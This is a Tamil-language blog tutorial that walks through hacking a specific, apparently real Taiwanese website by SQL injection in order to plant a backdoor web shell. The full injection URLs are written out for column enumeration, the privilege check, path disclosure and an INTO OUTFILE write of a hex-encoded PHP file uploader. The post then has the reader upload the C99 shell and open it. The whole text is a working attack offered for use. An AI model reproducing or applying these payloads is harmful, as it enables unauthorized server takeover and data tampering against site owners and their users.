website-ல்Backdoor Shell –ஐ Upload செய்வது எப்படி?

        

   SQLI Vuln உள்ள Site-ல் Backdoor Shell –ஐ Upload செய்வது எப்படி?
Backdoor Shell என்பது malicious Script ஆகும். இந்த Script -ஆனதுPHP,RUBY,PYTHON போன்றவற்றில் எழுதப்பட்டிருக்கும். இந்த Script-ன் மூலம் SERVER-ல் உள்ள எந்த DATA வையும் DELETE,EDIT செய்யமுடியும். சுருக்கமாக சொல்ல வேண்டுமானால் இது ஒரு வீட்டின் பின்பக்க கதவு போலதான் திருடன் வந்து கைவரிசையை கட்ட முடியும். நாம் இன்று பார்க்க போகும் முறை Website Admin Panel வழியாக  Website –ன் Sever-ல் நுழையாமல் Backdoor Shell –ஐ Upload செய்து அதன் மூலம் Server-ல் நுழைய போகிறோம்.
 Backdoor Shell –ஐ Upload செய்ய தேவயானவை
 * Target Site
 * Target Site file path
 நான் இந்த பதிவில் C99.php என்ற Backdoor Shell –ஐ பயன் படுத்தி உள்ளேன்.   நான் எடுத்து கொண்ட Target Site http://taiwan-tiger.tw/news_index.php?id=-4. Target Site-ன் file path- /usr/local/www/apache24/data/shop028/,  file path –ஐ கண்டறிவது எப்படி என்று கூறுகிறேன்.
Site-ன் Total Columns 4 ஆகும். http://taiwan-tiger.tw/news_index.php?id=-4'+ORDER+BY+4--+


VULN Columns 2,3,4[Injection Point] http://taiwan-tiger.tw/news_index.php?id=-4'+UNION+ALL+SELECT+1,2,3,4--+


 Backdoor Shell Upload செய்வதற்கு முன்னால்  ”PRIVILEGES” Check செய்ய வேண்டும். PRIVILEGES என்பது நம்மால் File Upload செய்ய முடியுமா என்பதை Check செய்ய கூடிய Command.Hackbar-ல் Union Based>Basic Statement> PRIVILEGES Check>via 1s PRIVILEGES என்ற Command-ஐ Injection Point  2,3,4 இதில் ஏதேனும் ஒன்றில் Execute செய்யவும். http://taiwan-tiger.tw/news_index.php?id=-4'+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),3,4--+

அவ்வாறு நீங்கள் Execute செய்யும் போது 'root'@'localhost' -> YES
,'root'@'localhost' -> YES
,'root'@'localhost' -> YES
,'root'@'localhost' -> YES
,'root'@'localhost' -> YES
,'root'@'localhost' -> YES
,'root'@'localhost' -> YES
,'root'@'localhost' -> YES
,'root'@'localhost' -> YES
,'root'@'localhost' -> YES
,'root'@'localhost' -> YES 
என்று வரும்  YES என்று வந்தால் மட்டுமே Backdoor Shell Upload செய்ய முடியும்.NO என வந்தால் Shell Upload செய்ய முடியாது.

அடுத்தது நமக்கு Target Site-ன் file path வேண்டும். file path-ஐ எடுக்க Vuln Link உடன் Hackbar-ல்ERROR/DOUBLE QUERY>ERROR BASED>GET VERSION Command-ஐ கொடுத்து Execute செய்வதன் மூலம்  . file path கிடைகும்.
http://taiwan-tiger.tw/news_index.php?id=-4'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+
file path /usr/local/www/apache24/data/shop028/conn/db_class.php

சில Site-களில் சதாரணமாகவே ERROR காட்டும்போது File path காட்டப்படும்.
சரி இப்பொது நமக்கு தேவையான அனைத்தும் கிடைத்து விட்டது. இனி Shell upload செய்வோம்.
http://taiwan-tiger.tw/news_index.php?id=-4'+UNION+ALL+SELECT+1,2,3,4--+ என்ற இந்த Link-ல் உள்ள ஏதேனும் ஒன்றின் 2,3,4 Injection Point –ல்


பிறகு நாம் கண்டுபிடித்த File Path-ஐ உள்ளிடவும். File Path-ஐ Uploader-ஐ உள்ளிட்ட பின் கடைசியில்3,4 'into outfile'/usr/local/www/apache24/data/ என்று இட்டபின் நாம் upload செய்யபோகும் FILE-க்கு NAME தேவை ஆகவே நான் 123.php என்று கொடுக்கிறேன். into outfile'/usr/local/www/apache24/data/ இங்கு தான் நமது File Nameகொடுக்க வேண்டும்/img/123’ ,
 into outfile'/usr/local/www/apache24/data//img/123.php’  File Path-ஐ’ ஆல் Close செயவும்’ ‘
இப்பொது இந்த இரண்டு Command-ஐயும் ஒன்று சேர்க்கவும்.
http://taiwan-tiger.tw/news_index.php?id=-4'+UNION+ALL+SELECT+1,0x3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e,3,4 into outfile"/usr/local/www/apache24/data/shop028/img/123.php’ --+
இப்பொது Execute கொடுக்கவும். Execute கொடுத்ததும் You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"/usr/local/www/apache24/data/shop028/img/123.php’ -- '' at line 1 என்ற Error காட்டும்.
அதை பற்றி கவலை படத்தேவையில்லை. இப்பொது நீங்கள் Create செய்த Filepath-ற்கு செல்லவும். Filepath-ற்கு செல்ல http://taiwan-tiger.tw+ நீங்கள் உங்கள் File-ற்கு கொடுத்த Name-ஐ Addressber-ல் இடவும். http://taiwan-tiger.tw/img/123.php
இது என்னுடைய Path. Browse என்பதை Click செய்து உங்களுடைய Backdoor Shell –ஐ Upload செய்வும்.

Upload செய்தவுடன் Upload !!! என்று காட்டும். இப்பொது நீங்கள் உங்கள் Shell-க்கு என்ன Name இருந்ததோ அதே Name-ல் http://taiwan-tiger.tw/img/இங்கு Shellnameகொடுக்கவும்.php. நான் என்னுடைய Shell-க்கு BOT என NAME வைது இருந்தேன் So
http://taiwan-tiger.tw/img/bot.php என Execute செய்யும் போது Shell-க்குள் சென்றுவிடும்.


 இந்த பதிவு புரியவில்லையென்றால் என்னுலைய Video-ஐ பார்த்து புரிந்து கொள்ளவும்        
                         Watch Video
                     






No comments